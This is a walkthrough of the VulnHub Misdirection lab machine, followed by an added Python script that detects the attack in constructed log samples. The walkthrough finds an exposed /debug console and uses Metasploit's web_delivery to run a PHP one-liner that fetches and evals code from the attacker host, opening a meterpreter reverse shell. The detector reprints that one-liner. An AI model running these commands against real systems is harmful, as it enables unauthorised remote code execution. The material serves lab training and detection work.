This week's exercise is the VulnHub Misdirection image, download address: https://download.vulnhub.com/misdirection/Misdirection.zip. After importing it successfully into Workstation, run a host discovery scan:

    sudo netdiscover -r 192.168.220.0/24

The target address is 192.168.220.166. Next, a port scan:

    sudo nmap -sS -sV -T5 -A -p- 192.168.220.166

This shows that the target has an HTTP service on port 8080. Continue with a path scan:

    dirb http://192.168.220.166:8080

which finds http://192.168.220.166:8080/debug. Opening http://192.168.220.166:8080/debug in a browser shows a web console that can execute commands; running id confirms that it works. On the Kali attack machine, build the reverse-shell script and start the reverse-shell listener:

    msfconsole
    use exploit/multi/script/web_delivery
    set target 1
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.220.157
    exploit

Then, in the target's web console, run:

    php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.220.157:8080/7oVVD731', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
………………………………
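From the defender's side, the two observable traces of this walkthrough are requests to the exposed /debug console in the web server's access log and a php process whose command line fetches and evals remote code. The following detection script is an added example, not part of the original write-up; the access-log lines and the process-audit lines it scans are constructed samples in a hypothetical format, and the /debug path and PHP one-liner are taken from the walkthrough above.

```python
import re

# Constructed sample access log lines (Apache/nginx combined-style, hypothetical).
SAMPLE_ACCESS_LOG = """\
192.168.220.157 - - [10/Jan/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 612
192.168.220.157 - - [10/Jan/2024:10:01:05 +0000] "GET /debug HTTP/1.1" 200 1543
192.168.220.157 - - [10/Jan/2024:10:01:09 +0000] "POST /debug HTTP/1.1" 200 87
192.168.220.158 - - [10/Jan/2024:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 612
"""

# Constructed sample process-audit lines (timestamp first, then key=value fields; hypothetical format).
# The first line reproduces the PHP one-liner from the walkthrough as the web server user would run it.
SAMPLE_PROCESS_LOG = """\
2024-01-10T10:01:09Z uid=33 ppid=1203 comm=sh cmdline=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.220.157:8080/7oVVD731', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
2024-01-10T10:01:10Z uid=33 ppid=1203 comm=php cmdline=php /var/www/html/index.php
2024-01-10T10:03:00Z uid=0 ppid=1 comm=cron cmdline=/usr/sbin/cron -f
"""

ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Paths that should never be reachable from the network; /debug is the console from the walkthrough.
SENSITIVE_PATHS = ("/debug",)


def parse_access_line(line):
    """Return the fields of one access-log line, or None if the line does not parse."""
    m = ACCESS_LOG_RE.match(line)
    return m.groupdict() if m else None


def find_console_access(log_text):
    """List (source, method, path, status) for every request that reached a sensitive path."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore the query string when matching
        if any(path == p or path.startswith(p + "/") for p in SENSITIVE_PATHS):
            hits.append((rec["src"], rec["method"], path, int(rec["status"])))
    return hits


# Independent signals that PHP is being used to fetch and execute remote code.
REMOTE_EVAL_PATTERNS = [
    re.compile(r"php\b.*\s-r\s"),                               # php running inline code
    re.compile(r"eval\s*\(\s*file_get_contents\s*\(", re.I),    # eval of fetched content
    re.compile(r"allow_url_fopen\s*=\s*(true|1|on)", re.I),     # remote fopen switched on
]


def score_process_line(line):
    """Count how many of the remote-eval signals appear in one process record."""
    return sum(1 for p in REMOTE_EVAL_PATTERNS if p.search(line))


def find_remote_eval(process_text, threshold=2):
    """List (timestamp, score) for process records that match at least `threshold` signals."""
    alerts = []
    for line in process_text.splitlines():
        s = score_process_line(line)
        if s >= threshold:
            alerts.append((line.split(" ", 1)[0], s))
    return alerts


if __name__ == "__main__":
    for hit in find_console_access(SAMPLE_ACCESS_LOG):
        print("console access:", hit)
    for alert in find_remote_eval(SAMPLE_PROCESS_LOG):
        print("remote eval in process:", alert)
```

Scoring the process record on several independent signals rather than one literal string keeps the rule useful when the one-liner is reworded, while the access-log check is deliberately strict on path: a single request to /debug from outside is already the finding, whatever the response code.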